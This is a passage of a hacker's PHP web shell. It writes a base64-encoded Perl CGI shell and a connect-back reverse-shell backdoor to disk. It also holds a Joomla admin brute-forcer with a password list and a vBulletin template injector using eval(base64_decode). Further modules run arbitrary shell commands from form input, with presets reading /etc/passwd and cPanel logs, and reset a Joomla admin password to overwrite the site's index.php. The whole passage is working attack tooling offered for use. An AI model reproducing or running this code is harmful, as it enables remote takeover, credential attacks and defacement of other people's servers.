GFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlLiBJZiB0aGUKIyBmaWxlIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgc3RhcnRzIHRoZSB1cGxvYWQgcHJvY2Vzcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgVXBsb2FkRmlsZQp7CgkjIGlmIG5vIGZpbGUgaXMgc3BlY2lmaWVkLCBwcmludCB0aGUgdXBsb2FkIGZvcm0gYWdhaW4KCWlmKCRUcmFuc2ZlckZpbGUgZXEgIiIpCgl7CgkJJlByaW50UGFnZUhlYWRlcigiZiIpOwoJCSZQcmludEZpbGVVcGxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJJlByaW50UGFnZUhlYWRlcigiYyIpOwoKCSMgc3RhcnQgdGhlIHVwbG9hZGluZyBwcm9jZXNzCglwcmludCAiPGNvZGU+VXBsb2FkaW5nICRUcmFuc2ZlckZpbGUgdG8gJEN1cnJlbnREaXIuLi48YnI+IjsKCgkjIGdldCB0aGUgZnVsbGx5IHF1YWxpZmllZCBwYXRobmFtZSBvZiB0aGUgZmlsZSB0byBiZSBjcmVhdGVkCgljaG9wKCRUYXJnZXROYW1lKSBpZiAoJFRhcmdldE5hbWUgPSAkQ3VycmVudERpcikgPX4gbS9bXFxcL10kLzsKCSRUcmFuc2ZlckZpbGUgPX4gbSEoW14vXlxcXSopJCE7CgkkVGFyZ2V0TmFtZSAuPSAkUGF0aFNlcC4kMTsKCgkkVGFyZ2V0RmlsZVNpemUgPSBsZW5ndGgoJGlueydmaWxlZGF0YSd9KTsKCSMgaWYgdGhlIGZpbGUgZXhpc3RzIGFuZCB3ZSBhcmUgbm90IHN1cHBvc2VkIHRvIG92ZXJ3cml0ZSBpdAoJaWYoLWUgJFRhcmdldE5hbWUgJiYgJE9wdGlvbnMgbmUgIm92ZXJ3cml0ZSIpCgl7CgkJcHJpbnQgIkZhaWxlZDogRGVzdGluYXRpb24gZmlsZSBhbHJlYWR5IGV4aXN0cy48YnI+IjsKCX0KCWVsc2UgIyBmaWxlIGlzIG5vdCBwcmVzZW50Cgl7CgkJaWYob3BlbihVUExPQURGSUxFLCAiPiRUYXJnZXROYW1lIikpCgkJewoJCQliaW5tb2RlKFVQTE9BREZJTEUpIGlmICRXaW5OVDsKCQkJcHJpbnQgVVBMT0FERklMRSAkaW57J2ZpbGVkYXRhJ307CgkJCWNsb3NlKFVQTE9BREZJTEUpOwoJCQlwcmludCAiVHJhbnNmZXJlZCAkVGFyZ2V0RmlsZVNpemUgQnl0ZXMuPGJyPiI7CgkJCXByaW50ICJGaWxlIFBhdGg6ICRUYXJnZXROYW1lPGJyPiI7CgkJfQoJCWVsc2UKCQl7CgkJCXByaW50ICJGYWlsZWQ6ICQhPGJyPiI7CgkJfQoJfQoJcHJpbnQgIjwvY29kZT4iOwoJJlByaW50Q29tbWFuZExpbmVJbnB1dEZvcm07CgkmUHJpbnRQYWdlRm9vdGVyOwp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdXNlciB3YW50cyB0byBkb3dubG9hZCBhIGZpbGUuIElmIHRoZQojIGZpbGVuYW1lIGlzIG5vdCBzcGVjaWZpZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSBhbGxvd2luZyB0aGUgdXNlciB0byBzcGVjaWZ5IGEKIyBmaWxlLCBvdGhlcndpc2UgaXQgZGlzcGxheXMgYSBtZXNzYWdlIHRvIHRoZSB1c2VyIGFuZCBwcm92aWRlcyBhIGxpbmsKIyB0aHJvdWdoICB3aGljaCB0aGUgZmlsZSBjYW4gYmUgZG93bmxvYWRlZC4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgRG93bmxvYWRGaWxlCnsKCSMgaWYgbm8gZmlsZSBpcyBzcGVjaWZpZWQsIHByaW50IHRoZSBkb3dubG9hZCBmb3JtIGFnYWluCglpZigkVHJhbnNmZXJGaWxlIGVxICIiKQoJewoJCSZQcmludFBhZ2VIZWFkZXIoImYiKTsKCQkmUHJpbnRGaWxlRG93bmxvYWRGb3JtOwoJCSZQcmludFBhZ2VGb290ZXI7CgkJcmV0dXJuOwoJfQoJCgkjIGdldCBmdWxseSBxdWFsaWZpZWQgcGF0aCBvZiB0aGUgZmlsZSB0byBiZSBkb3dubG9hZGVkCglpZigoJFdpbk5UICYgKCRUcmFuc2ZlckZpbGUgPX4gbS9eXFx8Xi46LykpIHwKCQkoISRXaW5OVCAmICgkVHJhbnNmZXJGaWxlID1+IG0vXlwvLykpKSAjIHBhdGggaXMgYWJzb2x1dGUKCXsKCQkkVGFyZ2V0RmlsZSA9ICRUcmFuc2ZlckZpbGU7Cgl9CgllbHNlICMgcGF0aCBpcyByZWxhdGl2ZQoJewoJCWNob3AoJFRhcmdldEZpbGUpIGlmKCRUYXJnZXRGaWxlID0gJEN1cnJlbnREaXIpID1+IG0vW1xcXC9dJC87CgkJJFRhcmdldEZpbGUgLj0gJFBhdGhTZXAuJFRyYW5zZmVyRmlsZTsKCX0KCglpZigkT3B0aW9ucyBlcSAiZ28iKSAjIHdlIGhhdmUgdG8gc2VuZCB0aGUgZmlsZQoJewoJCSZTZW5kRmlsZVRvQnJvd3NlcigkVGFyZ2V0RmlsZSk7Cgl9CgllbHNlICMgd2UgaGF2ZSB0byBzZW5kIG9ubHkgdGhlIGxpbmsgcGFnZQoJewoJCSZQcmludERvd25sb2FkTGlua1BhZ2UoJFRhcmdldEZpbGUpOwoJfQp9CgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgTWFpbiBQcm9ncmFtIC0gRXhlY3V0aW9uIFN0YXJ0cyBIZXJlCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KJlJlYWRQYXJzZTsKJkdldENvb2tpZXM7CgokU2NyaXB0TG9jYXRpb24gPSAkRU5WeydTQ1JJUFRfTkFNRSd9OwokU2VydmVyTmFtZSA9ICRFTlZ7J1NFUlZFUl9OQU1FJ307CiRMb2dpblBhc3N3b3JkID0gJGlueydwJ307CiRSdW5Db21tYW5kID0gJGlueydjJ307CiRUcmFuc2ZlckZpbGUgPSAkaW57J2YnfTsKJE9wdGlvbnMgPSAkaW57J28nfTsKCiRBY3Rpb24gPSAkaW57J2EnfTsKJEFjdGlvbiA9ICJsb2dpbiIgaWYoJEFjdGlvbiBlcSAiIik7ICMgbm8gYWN0aW9uIHNwZWNpZmllZCwgdXNlIGRlZmF1bHQKCiMgZ2V0IHRoZSBkaXJlY3RvcnkgaW4gd2hpY2ggdGhlIGNvbW1hbmRzIHdpbGwgYmUgZXhlY3V0ZWQKJEN1cnJlbnREaXIgPSAkaW57J2QnfTsKY2hvcCgkQ3VycmVudERpciA9IGAkQ21kUHdkYCkgaWYoJEN1cnJlbnREaXIgZXEgIiIpOwoKJExvZ2dlZEluID0gJENvb2tpZXN7J1NBVkVEUFdEJ30gZXEgJFBhc3N3b3JkOwoKaWYoJEFjdGlvbiBlcSAibG9naW4iIHx8ICEkTG9nZ2VkSW4pICMgdXNlciBuZWVkcy9oYXMgdG8gbG9naW4KewoJJlBlcmZvcm1Mb2dpbjsKfQplbHNpZigkQWN0aW9uIGVxICJjb21tYW5kIikgIyB1c2VyIHdhbnRzIHRvIHJ1biBhIGNvbW1hbmQKewoJJkV4ZWN1dGVDb21tYW5kOwp9CmVsc2lmKCRBY3Rpb24gZXEgInVwbG9hZCIpICMgdXNlciB3YW50cyB0byB1cGxvYWQgYSBmaWxlCnsKCSZVcGxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImRvd25sb2FkIikgIyB1c2VyIHdhbnRzIHRvIGRvd25sb2FkIGEgZmlsZQp7CgkmRG93bmxvYWRGaWxlOwp9CmVsc2lmKCRBY3Rpb24gZXEgImxvZ291dCIpICMgdXNlciB3YW50cyB0byBsb2dvdXQKewoJJlBlcmZvcm1Mb2dvdXQ7Cn0K\';\r\n\r\n$file = fopen("izo.cin" ,"w+");\r\n$write = fwrite ($file ,base64_decode($cgishellizocin));\r\nfclose($file);\r\n    chmod("izo.cin",0755);\r\n$netcatshell = \'IyEvdXNyL2Jpbi9wZXJsDQogICAgICB1c2UgU29ja2V0Ow0KICAgICAgcHJpbnQgIkRhdGEgQ2hh\r\nMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQogICAgICBpZiAoISRBUkdWWzBdKSB7DQog\r\nICAgICAgIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogICAgICAgIGV4aXQo\r\nMSk7DQogICAgICB9DQogICAgICBwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KICAg\r\nICAgJGhvc3QgPSAkQVJHVlswXTsNCiAgICAgICRwb3J0ID0gODA7DQogICAgICBpZiAoJEFSR1Zb\r\nMV0pIHsNCiAgICAgICAgJHBvcnQgPSAkQVJHVlsxXTsNCiAgICAgIH0NCiAgICAgIHByaW50ICJb\r\nKl0gQ29ubmVjdGluZy4uLlxuIjsNCiAgICAgICRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3An\r\nKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0KICAgICAgc29ja2V0KFNFUlZFUiwgUEZf\r\nSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCiAg\r\nICAgIG15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KICAgICAgaWYgKCFjb25uZWN0KFNF\r\nUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogICAgICAgIGRpZSgi\r\nVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBTcGF3bmlu\r\nZyBTaGVsbFxuIjsNCiAgICAgIGlmICghZm9yayggKSkgew0KICAgICAgICBvcGVuKFNURElOLCI+\r\nJlNFUlZFUiIpOw0KICAgICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgICAgICAgb3Bl\r\nbihTVERFUlIsIj4mU0VSVkVSIik7DQogICAgICAgIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAu\r\nICJcMCIgeCA0Ow0KICAgICAgICBleGl0KDApOw0KICAgICAgfQ0KICAgICAgcHJpbnQgIlsqXSBE\r\nYXRhY2hlZFxuXG4iOw==\';\r\n\r\n$file = fopen("dc.pl" ,"w+");\r\n$write = fwrite ($file ,base64_decode($netcatshell));\r\nfclose($file);\r\n    chmod("dc.pl",0755);\r\n   echo "<iframe src=cgitelnet1/izo.cin width=96% height=90% frameborder=0></iframe> \r\n\r\n \r\n </div>"; }\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jbrute\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jbrute" method="post">\r\n\r\n\t<meta name="author" content="RetnOHacK" />\r\n    <meta name="keywords" content="Joomla, Bruter, JoomlaBruter, JoomlaBruterForce, JoomlaBruterForceOnline" />\r\n    <meta name="description" content="RetnOHacK #Procoder\'z Team Albanian" />\r\n<center>\r\n</br></br>\r\n<center><b><font color="lime">+--=[ Joomla Bruter Force ]=--+</font></b><br /><br />\r\n<form method="post" action="" enctype="multipart/form-data"> \r\n<table class="tabnet" width="38%" border="0"><center>\r\n<th colspan="2">Joomla Brute Force</th>\r\n<tr><td><p ><font  class="d1">User :</font></th>\r\n<input class="inputz" type=\'text\' name="usr" value="admin" size="15"> </font></center><br /><br /></p>\r\n</td></tr>\r\n<tr><td><font class="">Sites list :</font> \r\n</td><td><font class="" >Pass list :</font></td></tr>\r\n<tr>\r\n\t\t<td>\r\n<textarea name="sites" style="background:black;" cols="40" rows="13" ></textarea>\r\n</td><td>\r\n<textarea name="w0rds" style="background:black;" cols="40" rows="13" >\r\nadmin\r\n123456\r\npassword\r\n102030\r\n123123\r\n12345\r\n123456789\r\npass\r\ntest\r\nadmin123\r\ndemo\r\n!@#$%^\r\n</textarea>\r\n</td></tr><center><tr><td>\r\n<font > \r\n<input class="inputzbut" type="submit" name="x" value="start" id="d4"> \r\n</font></td></tr><br>\r\ntanks for procoder\'z team albanian<br></center></table>\r\n</form></center>\r\n<? \r\n@set_time_limit(0); \r\n\r\nif($_POST[\'x\']){ \r\n\r\necho "<hr>"; \r\n\r\n$sites = explode("\\n",$_POST["sites"]); // Get Sites \r\n$w0rds = explode("\\n",$_POST["w0rds"]); // Get w0rdLiSt \r\n\r\n$Attack = new Joomla_brute_Force(); // Active Class \r\n\r\n\r\nforeach($w0rds as $pwd){ \r\n\r\nforeach($sites as $site){ \r\n\r\n\r\n$Attack->check_it(txt_cln($site),$_POST[\'usr\'],txt_cln($pwd)); // Brute :D \r\nflush();flush(); \r\n\r\n} \r\n\r\n} \r\n\r\n} \r\n\r\n\r\n# Class & Function\'z \r\n\r\nfunction txt_cln($value){  return str_replace(array("\\n","\\r"),"",$value); } \r\n\r\nclass Joomla_brute_Force{ \r\n\r\npublic function check_it($site,$user,$pass){ // print result \r\n\r\nif(eregi(\'com_config\',$this->post($site,$user,$pass))){ \r\n\r\necho "<span class=\\"x2\\"><b># Success : $user:$pass -> <a href=\'$site/administrator/index.php\'>$site/administrator/index.php</a></b></span><BR>";\r\n$f = fopen("Result.txt","a+"); fwrite($f , "Success ~~ $user:$pass -> $site/administrator/index.php\\n"); fclose($f); \r\nflush(); \r\n}else{ echo "# Failed : $user:$pass -> $site<BR>"; flush();} \r\n\r\n} \r\n\r\npublic function post($site,$user,$pass){ // Post -> user & pass \r\n\r\n$token = $this->extract_token($site); \r\n\r\n$curl=curl_init(); \r\n\r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_POST,1); \r\ncurl_setopt($curl,CURLOPT_POSTFIELDS,\'username=\'.$user.\'&passwd=\'.$pass.\'&lang=en-GB&option=com_login&task=login&\'.$token.\'=1\'); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\npublic function extract_token($site){ // get token from source for -> function post \r\n\r\n$source = $this->get_source($site); \r\n\r\npreg_match_all("/type=\\"hidden\\" name=\\"([0-9a-f]{32})\\" value=\\"1\\"/si" ,$source,$token); \r\n\r\nreturn $token[1][0]; \r\n\r\n} \r\n\r\npublic function get_source($site){ // get source for -> function extract_token \r\n\r\n$curl=curl_init(); \r\ncurl_setopt($curl,CURLOPT_RETURNTRANSFER,1); \r\ncurl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php"); \r\n@curl_setopt($curl,CURLOPT_COOKIEFILE,\'cookie.txt\'); \r\n@curl_setopt($curl,CURLOPT_COOKIEJAR,\'cookie.txt\'); \r\ncurl_setopt($curl,CURLOPT_USERAGENT,\'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4\'); \r\n@curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1); \r\ncurl_setopt($curl,CURLOPT_TIMEOUT,20); \r\n\r\n$exec=curl_exec($curl); \r\ncurl_close($curl); \r\nreturn $exec; \r\n\r\n} \r\n\r\n} \r\n}\r\n/////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'vb\'))\r\n   {\r\n   ?>\r\n   <form action="?y=<?php echo $pwd; ?>&x=vb" method="post">\r\n   <br><br><br><div align="center">\r\n   <H2><span style="font-weight: 400"><font face="Trebuchet MS" size="4">\r\n   <b><font color="#00FF00">+--=[ VB Index Changer ]=--+</font></b>\r\n   </div><br>\r\n   <?\r\n   if(empty($_POST[\'index\'])){\r\n   echo "<center><FORM method=\\"POST\\">";\r\n   echo "<table class=\\"tabnet\\">\r\n<th colspan=\\"2\\">Vb Index Changer</th>\r\n<tr><td>host </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"localhost\\" value=\\"localhost\\"></td></tr>\r\n<tr><td>database </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"database\\" value=\\"forum_vb\\"></td></tr>\r\n<tr><td>username </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"username\\" value=\\"user_vb\\"></td></tr>\r\n<tr><td>password </td><td><input class=\\"inputz\\" type=\\"text\\" size=\\"60\\" name=\\"password\\" value=\\"vb\\"></td></tr>\r\n</tr>\r\n<th colspan=\\"2\\">Your Index Code</th></table><table class=\\"tabnet\\">\r\n<TEXTAREA name=\\"index\\" rows=\\"13\\" style=\\"background:black\\" border=\\"1\\" cols=\\"69\\" name=\\"code\\">your index code</TEXTAREA><br>\r\n<INPUT class=\\"inputzbut\\" type=\\"submit\\" value=\\"setting\\" name=\\"send\\">\r\n</FORM></table></center>";\r\n    }else{\r\n    $localhost = $_POST[\'localhost\'];\r\n    $database = $_POST[\'database\'];\r\n    $username = $_POST[\'username\'];\r\n    $password = $_POST[\'password\'];\r\n    $index = $_POST[\'index\'];\r\n    @mysql_connect($localhost,$username,$password) or die(mysql_error());\r\n    @mysql_select_db($database) or die(mysql_error());\r\n    $index=str_replace("\\\'","\'",$index);\r\n    $set_index = "{\\${eval(base64_decode(\\\'";\r\n    $set_index .= base64_encode("echo \\"$index\\";");\r\n    $set_index .= "\\\'))}}{\\${exit()}}</textarea>";\r\n    echo("UPDATE template SET template =\'".$set_index."\' ") ;\r\n    $ok=@mysql_query("UPDATE template SET template =\'".$set_index."\'") or die(mysql_error());\r\n    if($ok){\r\n    echo "!! update finish !!<br><br>";\r\n    } \r\n  }\r\n}\r\n\r\n//////////////////////////////////////////////////////////////////////////////////////////////\r\n\r\nelseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'bypass\')) \r\n{ \r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=bypass" method="post">\r\n\r\n<?php\r\necho "<center/><br/><b><font color=#00ff00>-=[ Command  Bypass Exploit ]=-</font></b><br>\r\n";\r\nprint_r(\'\r\n<pre>\r\n<form method="POST" action="">\r\n<b><font color=#00ff00><b><font color="#00ff00">Command  :=) </font></font></b><input name="baba" type="text" class="inputz" size="34"><input type="submit" class="inputzbut" value="Go">\r\n</form>\r\n<form method="POST" action=""><strong><b><font color="#00ff00">Menu Bypass  :=)  </font></strong><select name="liz0" size="1" class="inputz">\r\n<option value="cat /etc/passwd">/etc/passwd</option>\r\n<option value="netstat -an | grep -i listen">netstat</option>\r\n<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>\r\n<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>\r\n<option value="cat /etc/hosts">/etc/hosts</option>\r\n<option value="cat /etc/named.conf">/etc/named.conf</option>\r\n<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>\r\n</select> <input type="submit" class="inputzbut" value="G&ouml;">\r\n</form>\r\n</pre>\r\n\');\r\nini_restore("safe_mode");\r\nini_restore("open_basedir");\r\n$liz0=shell_exec($_POST[baba]); \r\n$liz0zim=shell_exec($_POST[liz0]); \r\n$uid=shell_exec(\'id\');\r\n$server=shell_exec(\'uname -a\');\r\necho "<pre><h4>";\r\n\r\necho $liz0;\r\necho $liz0zim;\r\necho "</h4></pre>";\r\n "</div>"; }\r\n\r\n ///////////////////////////////////////////////////////////////////////////\r\n \r\n elseif(isset($_GET[\'x\']) && ($_GET[\'x\'] == \'jodexer\'))\r\n{\t\r\n?>\r\n<form action="?y=<?php echo $pwd; ?>&amp;x=jodexer" method="post">\r\n\r\n<?php\r\n\r\nfunction randomt() {\r\n    \r\n        $chars = "abcdefghijkmnopqrstuvwxyz023456789";\r\n        srand((double)microtime()*1000000);\r\n        $i = 0;\r\n        $pass = \'\' ;\r\n    \r\n        while ($i <= 7) {\r\n            $num = rand() % 33;\r\n            $tmp = substr($chars, $num, 1);\r\n            $pass = $pass . $tmp;\r\n            $i++;\r\n        }\r\n    \r\n        return $pass;\r\n    \r\n    }\r\n    function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1)\r\n    {\r\n    $ar0=explode($marqueurDebutLien, $text);\r\n    $ar1=explode($marqueurFinLien, $ar0[$i]);\r\n    $ar=trim($ar1[0]);\r\n    return $ar;\r\n    }\r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    \r\n    $text=file_get_contents($_POST[\'file\']);\r\n    $username=entre2v2($text,"public $user = \'","\';");\r\n    $password=entre2v2($text,"public $password = \', \'","\';");\r\n    $dbname=entre2v2($text,"public $db = \', \'","\';");\r\n    $dbprefix=entre2v2($text,"public $dbprefix = \'","\';");\r\n    $site_url=($_POST[\'site_url\']);\r\n    \r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    $co=randomt();  \r\n      /*\r\n    echo($username);\r\n    echo("<br>");\r\n    echo($password);\r\n    echo("<br>");\r\n    echo($dbname);\r\n    echo("<br>");\r\n    echo($dbprefix);\r\n    echo("<br>");\r\n    */\r\n    $co=randomt();\r\n    \r\n    if ($_POST[\'form_action\'])\r\n    {\r\n    $h="<? echo(stripslashes(base64_decode(\'".urlencode(base64_encode(str_replace("\'","\'",($_POST[\'code\']))))."\'))); exit; ?>";\r\n    \r\n    \r\n    \r\n    \r\n    \r\n          $link=mysql_connect("dzoed.druknet.bt",$username,$password) ;\r\n    \r\n             mysql_select_db($dbname,$link) ;\r\n    \r\n    $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username =\'admin\' , password = \'2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX\'");\r\n    echo("<br>[+] Changing admin password to 123456789");  \r\n                    \r\n                     $req =mysql_query("SELECT * from  `".$dbprefix."extensions` ");\r\n                    \r\n    if ( $req )\r\n    {\r\n    #################################################################\r\n    ######################        V1.6         ######################\r\n    #################################################################\r\n    \r\n                  \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."template_styles` WHERE client_id=\'0\' and home=\'1\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."extensions` WHERE name=\'".$template_name."\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_id=$data["extension_id"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 1);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n        curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n        curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    \r\n    \r\n    $buffer = curl_exec($ch);\r\n    \r\n    $return=entre2v2($buffer ,\'<input type="hidden" name="return" value="\',\'"\');\r\n    $hidden=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',4);\r\n    \r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456789&option=com_login&task=login&return=".$return."&".$hidden."=1");\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,"com_config");\r\n    if($pos === false) {\r\n    echo("<br>[-] Login Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] Login Successful");\r\n    }\r\n    ///////////////////////////\r\n    $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");\r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $hidden2=entre2v2($buffer ,\'<input type="hidden" name="\',\'" value="1"\',2);\r\n    if($hidden2) {\r\n    echo("<br>[+] index.php file founded in Theme Editor");\r\n    }\r\n    else {\r\n    echo("<br>[-] index.php Not found in Theme Editor");\r\n    exit;\r\n    }\r\n    echo("<br>[*] Updating Index.php .....");\r\n    $url2=$site_url."/index.php?option=com_templates&layout=edit";\r\n    \r\n    $ch = curl_init();\r\n    curl_setopt($ch, CURLOPT_URL, $url2);\r\n    curl_setopt($ch, CURLOPT_POST, 1);\r\n    curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$h."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");\r\n    \r\n    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);\r\n    curl_setopt($ch, CURLOPT_HEADER, 0);\r\n    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n    curl_setopt($ch, CURLOPT_COOKIEJAR, $co);\r\n    curl_setopt($ch, CURLOPT_COOKIEFILE, $co);\r\n    $buffer = curl_exec($ch);\r\n    \r\n    $pos = strpos($buffer,\'<dd class="message message">\');\r\n    if($pos === false) {\r\n    echo("<br>[-] Updating Index.php Error");\r\n    exit;\r\n    }\r\n    else {\r\n    echo("<br>[~] index.php successfully saved");\r\n    }\r\n    #################################################################\r\n    ######################      V1.6  END      ######################\r\n    #################################################################\r\n    \r\n    \r\n    }\r\n    else\r\n    {\r\n    \r\n    #################################################################\r\n    ######################      V1.5           ######################\r\n    #################################################################\r\n                    \r\n    $req =mysql_query("SELECT * from  `".$dbprefix."templates_menu` WHERE client_id=\'0\'");\r\n             $data = mysql_fetch_array($req);\r\n    $template_name=$data["template"];\r\n    \r\n    $url2=$site_url."/index.php";\r\n    $ch = curl_init();\r\n    curl_setopt($ch, 